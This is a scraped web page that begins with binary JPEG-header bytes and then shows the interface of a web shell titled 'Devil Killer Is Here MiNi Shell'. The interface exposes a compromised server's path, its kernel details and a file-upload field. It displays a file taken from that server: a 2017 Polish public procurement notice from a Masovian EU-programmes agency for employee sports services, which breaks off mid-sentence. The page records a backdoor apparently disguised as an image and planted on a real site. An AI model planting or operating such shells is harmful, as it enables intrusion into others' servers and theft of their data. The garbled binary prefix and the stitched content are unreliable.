JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171215/632021-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 632021-N-2017 z dnia 2017-12-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Mazowiecka Jednostka Wdrażania Programów Unijnych</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Świadczenie usług sportowo-rekreacyjnych dla pracowników Mazowieckiej Jednostki Wdrażania Programów Unijnych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Mazowiecka Jednostka Wdrażania Programów Unijnych</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">14094497100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Jagiellońska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">74</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">03301 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-22 542 20 00</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">m.kosior@mazowia.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-22 698 31 57</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.mazowia.eu</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">http://bip.mazowia.eu/zamowienia-publiczne/</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.mazowia.eu/zamowienia-publiczne/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.mazowia.eu/zamowienia-publiczne/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Zamawiajacy wymaga przesłania ofert wyłącznie w formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Mazowiecka Jednostka Wdrażania Programów Unijnych, ul. Jegiellońska 74, 03-301</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Świadczenie usług sportowo-rekreacyjnych dla pracowników Mazowieckiej Jednostki Wdrażania Programów Unijnych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WZP/WKR/U-332-72/17</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest świadczenie wyselekcjonowanych przez Wykonawcę pod kątem potrzebZamawiającego usług dostępnych dla pracowników Mazowieckiej JednostkiWdrażania Programów Unijnych. Usługi będące przedmiotem umowy polegają naumożliwieniu pracownikom MJWPU nielimitowanego dostępu do wyznaczonychobiektów sportowych w całej Polsce w szczególności na terenie województwa mazowieckiego oraz udziału w zajęciach sportowych, ozróżnicowanym charakterze w obiektach, z którymi Wykonawca ma podpisaną umowęwspółpracy. 2. Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 2 doSIWZ; 3. Zamawiający nie wymaga zatrudnienia przez Wykonawcę lubPodwykonawcę na umowy o pracę w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca1974 r. - Kodeks pracy (Dz. U. z 2016 r., poz. 1666, z późn. zm.) osób wykonującychwskazane przez Zamawiającego czynności w zakresie realizacji zamówienia; 4.Zamawiający nie określa w opisie przedmiotu zamówienia wymagań związanych zrealizacją zamówienia, które obejmują aspekty gospodarcze, środowiskowe,społeczne, związane z innowacyjnością lub zatrudnieniem; 5. Wartość zamówienia nieprzekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8Ustawy Prawo zamówień publicznych (poniżej 209.000,00 euro).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">92610000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">336120,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">W uzupełnieniu informacji wskazanej w pkt II.8 niniejszegoogłoszenia Zamawiający informuje, że zamówienie będzie realizowane od dniazawarcia umowy przez okres maksymalnie 12 miesięcy, jednak nie później niż do dnia31 grudnia 2018 r.; </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa szczególnych warunków udziału wpostępowaniu w tym zakresie oraz nie wymaga od Wykonawców złożenia innychśrodków dowodowych niż oświadczenie, o którym mowa w pkt 17.1.1) SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa szczególnych warunków udziału wpostępowaniu w tym zakresie oraz nie wymaga od Wykonawców złożenia innychśrodków dowodowych niż oświadczenie, o którym mowa w pkt 17.1.1) SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. O udzielenie zamówienia mogą ubiegać się Wykonawcy,którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, októrych mowa w art. 22 ust. 1b ustawy P.z.p., w szczególności dotyczące: zdolnościtechnicznej lub zawodowej - 1) O zamówienie może ubiegać się Wykonawca, któryzapewni dostęp do co najmniej 500 obiektów sportowych na terenie całegowojewództwa mazowieckiego; 2) Wymagania dotyczące obiektów sportowych zostały wskazane w Załączniku nr 2 do SIWZ - Szczegółowym Opisie Przedmiotu Zamówienia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. Ocena spełniania powyższych warunków wymaganych odWykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia; 2. Wykonawcamoże w celu potwierdzenia spełniania warunków udziału w postępowaniu, wstosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowejlub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączącychgo z nim stosunków prawnych, z zastrzeżeniem pkt 8; 3. Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, żerealizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, wszczególności przedstawiając zobowiązanie tych podmiotów do oddania mu dodyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia; 4. Zamawiającyoceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lubzawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanieprzez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy niezachodzą wobec tego podmiotu podstawy wykluczenia; 5. W odniesieniu dowarunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty tezrealizują usługi, do realizacji których te zdolności są wymagane; 6. Wykonawca,który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiadasolidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodęponiesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów,chyba że za nieudostępnienie zasobów nie ponosi winy; 7. Jeżeli zdolności technicznelub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotu, o którym mowa wpkt 14.3 SIWZ, nie potwierdzają spełnienia przez wykonawcę warunków udziału wpostępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia,Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego: 1)zastąpił ten podmiot innym podmiotem lub podmiotami lub; 2) zobowiązał się doosobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolnościtechniczne lub zawodowe lub sytuację finansową lub ekonomiczną, o których mowa wpkt 14.3 SIWZ; 8. Zamawiający nie dopuszcza wykazania spełnienia warunku, októrym mowa w pkt 14.1.1) SIWZ, na podstawie art. 22a ust. 1 ustawy P.z.p. Jakwynika z art. 22a ust. 1 ustawy P.z.p., uprawnienie to nie obejmuje warunkuposiadania uprawnień. W tym zakresie Zamawiający wymaga wykazania spełnieniawskazanego warunku bezpośrednio od Wykonawcy ubiegającego się o zamówieniepubliczne; 9. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia; 10. Wprzypadku, o którym mowa w pkt 14.10 SIWZ, Wykonawcy ustanawiająpełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia alboreprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio doWykonawców wspólnie ubiegających się o udzielenie zamówienia; 11. Wykonawca,którego ofertę oceniono jako najkorzystniejszą, na wezwanie Zamawiającegoprzedłoży w terminie 5 dni od dnia wezwania dokument pełnomocnictwa zawierającyw szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy,Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionegoPełnomocnika oraz zakres jego umocowania, obejmujący przede wszystkim: 1)reprezentowanie Konsorcjum w postępowaniu o udzielenie zamówienia publicznego;2) zaciąganie w imieniu Konsorcjum zobowiązań; 3) złożenie oferty wspólnie; 4)prowadzenie korespondencji i podejmowanie zobowiązań związanych zpostępowaniem o zamówienie publiczne; 12. Dokument pełnomocnictwa musi byćpodpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie oudzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika i przezosoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrzelub ewidencji Wykonawcy; 13. W zakresie dotyczącym uprawnień wystarczającym douznania spełniania warunku udziału w postępowaniu którego przedmiotemzamówienia są różne rodzaje dostaw lub/i usług, za właściwe należy uznać, gdyuprawnienie posiadał będzie co najmniej jeden z Konsorcjantów, który będzierealizował tę część zamówienia z którym wiąże się obowiązek posiadania uprawnień;14. W przypadku oceny spełniania warunków przetargowych przez podmiotywystępujące wspólnie, warunki te będą zsumowane w celu łącznej oceny. Potencjałpodmiotów występujących wspólnie powinien odpowiadać zdolności do wykonaniazamówienia pojedynczego Wykonawcy, zdolność podmiotów występujących wspólniedo wykonania przedmiotu zamówienia nie może być mniejsza niż Wykonawcy, którysamodzielnie ubiega się o udzielenie zamówienia; 15. Nie dopuszcza się uczestnictwadanego Wykonawcy w więcej niż jednym podmiocie występującym wspólnie; 16.Zamawiający nie dokonuje zastrzeżenia obowiązku osobistego wykonania przezWykonawcę kluczowych części 